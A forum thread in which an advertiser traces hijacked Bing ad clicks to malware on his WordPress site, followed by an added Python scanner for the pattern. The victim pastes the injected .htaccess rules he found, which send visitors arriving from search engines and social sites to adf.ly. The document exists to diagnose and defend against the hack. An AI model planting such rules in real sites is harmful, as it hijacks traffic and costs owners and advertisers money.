My Bing PPC clicks are being hijacked! Expert help needed.

I am advertising on the Bing search network, tracking my clicks and conversions using prosper 202.
For the past 3 days only around 7% of my clicks are registering in the tracking stats.
Usually all clicks will register in 202 (after a short delay).
It is as if the Bing clicks are being somehow sent elsewhere.
I have had to stop a profitable campaign because at 47c a click I am no longer making money.
If I check the destination URL everything is fine, but if I go to Bing search and click on my own ad an adf.ly page appears.
I would appreciate any help from Warriors.
Thx
  • Profile picture of the author Stockbob55
    Update....even when I click on my own signature on this forum it goes to adf.ly instead of my site....
    Signature
    If you are sick of the hype...watch this space!
  • Profile picture of the author ronrule
    Your sig link loads fine for me, have you run a virus scan? There are malicious browser plugins out there that can be used to target specific sites and redirect traffic elsewhere. If your site is being targeted, it's only affecting people who are infected.

    Some of these are pretty sneaky, they watch your browser activity and if the plugin detects you're logging into AdWords or AdCenter they'll add the domains you're advertising to the list.

    Try running Malwarebytes first and report back your results.
    Signature

    -
    Ron Rule
    http://ronrule.com

    • Profile picture of the author Stockbob55
      Originally Posted by ronrule View Post

      Your sig link loads fine for me, have you run a virus scan? There are malicious browser plugins out there that can be used to target specific sites and redirect traffic elsewhere. If your site is being targeted, it's only affecting people who are infected.

      Some of these are pretty sneaky, they watch your browser activity and if the plugin detects you're logging into AdWords or AdCenter they'll add the domains you're advertising to the list.

      Try running Malwarebytes first and report back your results.
      Thanks I have it running in the background as I type.

      Rob
      Signature
      If you are sick of the hype...watch this space!
      • Profile picture of the author Stockbob55
        Scan results:

        Malwarebytes Anti-Malware

        Scan type: Full scan (C:|)
        Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
        Scan options disabled: P2P
        Objects scanned: 449735
        Time elapsed: 1 hour(s), 15 minute(s), 32 second(s)

        No malicious items detected

        (end)
        Off to my php files next
        Signature
        If you are sick of the hype...watch this space!
        • Profile picture of the author paulgl
          Check all footers and headers, then change your password to something
          monstrous. Even then, they can get through. It's a weakness of all
          sites that have similar coding. Your host should be able to shut it down,
          but many can't or won't. The latest updates for all aspects of servers
          should be installed by any reputable host. But, sadly, this crap
          still gets through.

          Paul
          Signature

          If you were disappointed in your results today, lower your standards tomorrow.

          • Profile picture of the author Stockbob55
            Checking with Hostgator now....
            Signature
            If you are sick of the hype...watch this space!
    • Profile picture of the author timpears
      Originally Posted by ronrule View Post

      Your sig link loads fine for me,
      I on the other hand get an adf.ly page that has been suspended.
      Signature

      Tim Pears

      • Profile picture of the author Stockbob55
        Originally Posted by timpears View Post

        I on the other hand get an adf.ly page that has been suspended.
        Thank you, I was beginning to think that I was seeing things!!

        I spoke to my hosting company they said no problem at their end.
        Bing says no problem at their network either.

        I switched my IP address.
        Changed to a new laptop.
        Same issue.

        In fact the last 2 days alone my ad has been clicked on 177 times at 0.49c per click, costing me $87.61 at an average ctr of 1.47, but only 14 of those searchers were sent to my landing page according to my tracking which is very reliable.

        So my question is what happened to the other 163 clicks?
        Signature
        If you are sick of the hype...watch this space!
        • Profile picture of the author Stockbob55
          I am logging all of this here to help others who may encounter similar problems.
          If it can happen to me then it will surely happen to others.

          When I find the problem, which I will, I will report back here.

          Going to check out my php files.

          thanks to you all
          Rob
          Signature
          If you are sick of the hype...watch this space!
          • Profile picture of the author RandySwanston
            Even I am being redirected to adfly when I visit your website. I think your index.php page has been hijacked.

            Install the plugin Wordfence from here hxxp://wordpress.org/plugins/wordfence/ and start a website scan, it will scan through all the files and shows you where the problem is. It will help you clean your website without anyone's help. After clearing don't remove the plugin, it will protect your site from future attacks.

            Also check your .htaccess for any error. I had a similar issue on one of my WordPress sites; I found that the attacker had inserted some code into my .htaccess file, which was the cause of the redirection.

            Block "wp-config.php" file from public access and allow "wp-login.php" only from your IP to be on the safer side.

            Here are the codes:

            # Block all web access to wp-config.php
            <Files wp-config.php>
            Order allow,deny
            Deny from all
            </Files>

            # Allow wp-login.php only from your own IP address
            <Files wp-login.php>
            Order deny,allow
            Deny from all
            Allow from ENTER YOUR IP ADDRESS HERE
            </Files>

            Add these codes to your .htaccess file.
            Signature
  • Profile picture of the author svetod
    Hi, I think your website has a virus.
    Bing has nothing to do with it. I had the same thing in the past, found a doubtful code in all of the php-s on my server and the sites were redirecting to another one. If you are not good at web development, hire someone to find and clear this code for you.
    Signature
    Want To Know How I Make Money Online? Read my story http://affiliate-lifestyle.com/
    Follow me on Instagram for Daily Inspiration & Free Tips: svetlintodd
  • Profile picture of the author vask
    Ahh yeah man, I just scanned your site, you have some malware.

    Sorry, it sucks. It happened to me a couple days ago because I was stupid and neglected to protect my stuff -_-

    Check your files for weird php files or snippets. I found mine in a couple of my index.php files. Good luck!
    • Profile picture of the author Stockbob55
      Originally Posted by vask View Post

      Ahh yeah man, I just scanned your site, you have some malware.

      Sorry, it sucks. It happened to me a couple days ago because I was stupid and neglected to protect my stuff -_-

      Check your files for weird php files or snippets. I found mine in a couple of my index.php files. Good luck!
      That is interesting.
      Which site did you scan?
      Thx
      Rob
      Signature
      If you are sick of the hype...watch this space!
  • Profile picture of the author svetod
    Sometimes a simple malware scan won't help. Have a look at the source code and search for uncommon code.
    Signature
    Want To Know How I Make Money Online? Read my story http://affiliate-lifestyle.com/
    Follow me on Instagram for Daily Inspiration & Free Tips: svetlintodd
  • Profile picture of the author jovykhan
    Same here. Your website redirects to AdFly.

    I scanned your site through Sucuri and it detected suspicious redirect.

    Suspicious conditional redirect on:
    Kickinit4cash | Make Money Online For Beginners
    Suspicious conditional redirect.
    Details: Sucuri Malware Signatures
    Redirects users to:AdF.ly - Suspended
    Further details: Sucuri Malware Signatures
    Signature
    LocalFinder.net Australia's Leading Online Business Directory
    Australian Local Citation Service
    • Profile picture of the author Stockbob55
      This is the .htaccess file from the website.
      Is it normal?
      # BEGIN WordPress
      <IfModule mod_rewrite.c>
      RewriteEngine On
      RewriteBase /
      RewriteRule ^index.php$ - [L]
      RewriteCond %{REQUEST_FILENAME} !-f
      RewriteCond %{REQUEST_FILENAME} !-d
      RewriteRule . /index.php [L]
      </IfModule>

      # END WordPress
      Signature
      If you are sick of the hype...watch this space!
  • Profile picture of the author ronrule
    How is it that I can see the site without it redirecting?
    Signature

    -
    Ron Rule
    http://ronrule.com

    • Profile picture of the author Stockbob55
      Originally Posted by ronrule View Post

      How is it that I can see the site without it redirecting?
      I wish I knew the answer to that, on Bing about 7-8% of clicks go through to my landing page.
      Sometimes I can type in the URL and get to my site but usually not.
      Signature
      If you are sick of the hype...watch this space!
  • Profile picture of the author yukon
    There's a couple of redirects on the index page, looks like it only kicks in on the 2nd+ visit (cookie?).

    Here's a redirect trace using Firebug on Firefox.

    Search your htaccess file for an ow.ly URL, or use FTP (Filezilla) to look at your WP theme files for either an ow.ly URL or base64 code.




    Signature
    Hi
  • Profile picture of the author yukon
    A temporary fix would be to do this:
    1. Login to your wp-admin
    2. Turn off all WP-plugins
    3. Change your theme to the default WP theme
    4. Clear your browser history with CCleaner (free version)
    5. Visit the Index page 2 or 3 times to verify the redirect is gone, or let me know after you've done everything above & I'll run another redirect trace on the Index page with Firebug/Firefox.

    [edit]
    Assumes your htaccess file is ok, check that first.
    Signature
    Hi
    • Profile picture of the author Stockbob55
      Ok I have found it, I was looking in the wrong place.

      I looked at the .htaccess file for my site and didn't see any malicious code.

      It was in the root folder public_html .htaccess file.

      RewriteEngine On
      RewriteOptions inherit
      RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*bing.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*yahoo.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*facebook.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*fb\.me.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*twitter.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*live.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*gmail.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*paypal.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*digg.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*reddit.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*baidu.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*hotmail.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*amazon.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*pinterest.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*stumbleupon.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*bit.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*ow.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*goo.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*adf.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*tinyurl.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*t\.co.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*excite.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*ask.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*aol.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*outlook.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*vince.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*jvzoo.* [NC]
      RewriteCond %{HTTP_REFERER} .*black.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*ebay.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*tube.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*microsoft.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*huffingtonpost.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*wordpress.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*wikipedia.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*answers.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*linkedin.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*ehow.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*blog.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*craig.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*adobe.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*cnn.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*wow.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*yellow.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*vimeo.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*news.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*daily.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*yelp.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*imgur.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*photobucket.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*apple.* [NC,OR]
      RewriteCond %{HTTP_REFERER} .*webmd.* [NC,OR]
      RewriteRule .* AdF.ly - Suspended [R=301,L]
      # BEGIN WordPress
      <IfModule mod_rewrite.c>
      RewriteEngine On
      RewriteBase /
      RewriteRule ^index.php$ - [L]
      RewriteCond %{REQUEST_FILENAME} !-f
      RewriteCond %{REQUEST_FILENAME} !-d
      RewriteRule . /index.php [L]
      </IfModule>
      # END WordPress
      Signature
      If you are sick of the hype...watch this space!
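
A check for the pattern found in the post above, as an added example that is not part of the original thread or of any tool named in it: it reads each .htaccess from the site folder up to a chosen top directory (here the rules sat in public_html, not in the site's own folder) and flags any RewriteRule that redirects only when Referer or User-Agent conditions match. The function names, the sample rules and the redirect.example target are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# RewriteCond lines that test who sent the visitor (Referer) or which client it is.
COND = re.compile(r'^\s*RewriteCond\s+%\{(?:HTTP_REFERER|HTTP_USER_AGENT)\}\s+(\S+)', re.I)
ANY_COND = re.compile(r'^\s*RewriteCond\b', re.I)
# RewriteRule <pattern> <target> [flags]; a mangled target may contain spaces.
RULE = re.compile(r'^\s*RewriteRule\s+\S+\s+(.+?)(?:\s+\[([^\]]*)\])?\s*$', re.I)

# Constructed sample modelled on the rules in the thread; the target is a placeholder.
SAMPLE_PARENT = """\
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.* [NC]
RewriteRule .* http://redirect.example/placeholder [R=301,L]
"""
# The stock WordPress block quoted in the thread; it must not be flagged.
SAMPLE_SITE = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

def scan_text(text):
    """Return (line_no, trigger_patterns, target) per redirect gated on Referer/User-Agent."""
    findings, gated = [], []
    for no, line in enumerate(text.splitlines(), 1):
        cond = COND.match(line)
        if cond:
            gated.append(cond.group(1))
        elif ANY_COND.match(line):
            continue  # unrelated condition; it still belongs to the next rule
        else:
            rule = RULE.match(line)
            if rule:
                target = rule.group(1).strip()
                flags = {f.strip().split('=')[0].upper() for f in (rule.group(2) or '').split(',')}
                external = re.match(r'https?://', target, re.I) is not None
                if gated and (flags & {'R', 'REDIRECT'} or external):
                    findings.append((no, gated, target))
                gated = []  # conditions apply only to the rule that follows them
    return findings

def htaccess_chain(site_dir, top):
    """Every existing .htaccess from site_dir up to and including top (e.g. public_html)."""
    site_dir, top = Path(site_dir).resolve(), Path(top).resolve()
    dirs = [site_dir] + [p for p in site_dir.parents if p == top or top in p.parents]
    return [d / '.htaccess' for d in dirs if (d / '.htaccess').is_file()]

def scan_site(site_dir, top):
    """Map each .htaccess on the path to its list of findings (empty list = clean)."""
    return {str(p): scan_text(p.read_text(errors='replace')) for p in htaccess_chain(site_dir, top)}

if __name__ == '__main__':
    for no, patterns, target in scan_text(SAMPLE_PARENT):
        print(f'line {no}: redirect to {target!r} when referer matches {patterns}')
```

A clean result here only covers .htaccess rules; it says nothing about injected PHP in themes, plugins or core files.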
    • Profile picture of the author Stockbob55
      Originally Posted by yukon View Post

      A temporary fix would be to do this:
      1. Login to your wp-admin
      2. Turn off all WP-plugins
      3. Change your theme to the default WP theme
      4. Clear your browser history with CCleaner (free version)
      5. Visit the Index page 2 or 3 times to verify the redirect is gone, or let me know after you've done everything above & I'll run another redirect trace on the Index page with Firebug/Firefox.
      [edit]
      Assumes your htaccess file is ok, check that first.
      I have deleted the code in the .htaccess file and carried out the above instructions. Still redirecting here.
      Signature
      If you are sick of the hype...watch this space!
      • Profile picture of the author yukon
        Originally Posted by Stockbob55 View Post

        I have deleted the code in the .htaccess file and carried out the above instructions. Still redirecting here.
        I clicked your forum sig. link 5 times & your index page loads fine for me, no redirects.

        Make sure your browser history is cleared, you might have an adf.ly cookie, or WP cache is messing with you?

        I use CCleaner (free version).
        Signature
        Hi
  • Profile picture of the author dcary13
    Well, that's fine that you removed it.

    The problem is that you simply miss the basic knowledge to handle it.

    You have no idea how they did it, right?

    Which means the backdoor is still there, your server will be hijacked soon again and so on.

    You need help from someone and that person must investigate your whole installation.
    And close the backdoor of course.
    • Profile picture of the author yukon
      Originally Posted by dcary13 View Post

      Well, that's fine that you removed it.

      The problem is that you simply miss the basic knowledge to handle it.

      You have no idea how they did it, right?

      Which means the backdoor is still there, your server will be hijacked soon again and so on.

      You need help from someone and that person must investigate your whole installation.
      And close the backdoor of course.
      OP said he disabled the WP plugins & switched back to the default WP theme, the OP forum sig./link no longer redirects to adf.ly on/after the 2nd click on the forum sig. link.

      It was most likely the usual stuff, either a free WP theme or a free WP plugin that was hacked before it was ever uploaded to the OPs server/host.

      Related link: How to check your site for base64 links
      Signature
      Hi
      • Profile picture of the author Stockbob55
        Originally Posted by yukon View Post

        OP said he disabled the WP plugins & switched back to the default WP theme, the OP forum sig./link no longer redirects to adf.ly on/after the 2nd click on the forum sig. link.

        It was most likely the usual stuff, either a free WP theme or a free WP plugin that was hacked before it was ever uploaded to the OPs server/host.

        Related link: How to check your site for base64 links
        Thanks for the useful link.

        I am trying to track down the source of the problem, partly because I don't want to make the same mistake again but also because the infected file may still be on my computer.
        The last change to my .htaccess file was on 7/29 so I will start there by looking at any downloads.
        Signature
        If you are sick of the hype...watch this space!
        • Profile picture of the author RandySwanston
          Originally Posted by Stockbob55 View Post

          Thanks for the useful link.

          I am trying to track down the source of the problem, partly because I don't want to make the same mistake again but also because the infected file may still be on my computer.
          The last change to my .htaccess file was on 7/29 so I will start there by looking at any downloads.
          I suggest you re-install your WP core files (only core files not the entire WP), you may not know, but there might be some changes made even to the core files. So it's better to be on the safer side. Ask your hosting provider to check out from their end, because the malware might have come through your hosting server.
          Signature
    • Profile picture of the author Stockbob55
      Originally Posted by dcary13 View Post

      Well, that's fine that you removed it.

      The problem is that you simply miss the basic knowledge to handle it.

      You have no idea how they did it, right?

      Which means the backdoor is still there, your server will be hijacked soon again and so on.

      You need help from someone and that person must investigate your whole installation.
      And close the backdoor of course.
      Yes, I understand what you are saying and I have had a crash course in basic knowledge over the last few days to be sure.
      This incident has caused me to re-examine the possible WordPress vulnerabilities and learn some more about protecting my websites.
      Thanks for your help
      Signature
      If you are sick of the hype...watch this space!
  • Profile picture of the author TwinkleToes
    It seems that you have malware! Get a virus scan done and check for new updates. There are some notorious plugins that may be the cause and check them as well. Bing is not your problem and it is not targeting your site. There are a few checks you should do and so get down to them right away. There can also be an error in the coding of your website and so you can check it. In case you do not have the expertise you can get help from professionals who will do it for you at a nominal cost. Now if you really wish to make your site proof free ensure you have a password that is alpha numeric. This makes it hard for hackers to crack and protects your site from unauthorized access.
    Signature
    Ask...Because you never stop learning.
  • It is problem with Prosper 202 and now with Bing.

    I have similar problems. Prosper is a FREE tool and has challenges with support. It is tough to understand how to work on it until I got a course on it and it helped me a lot.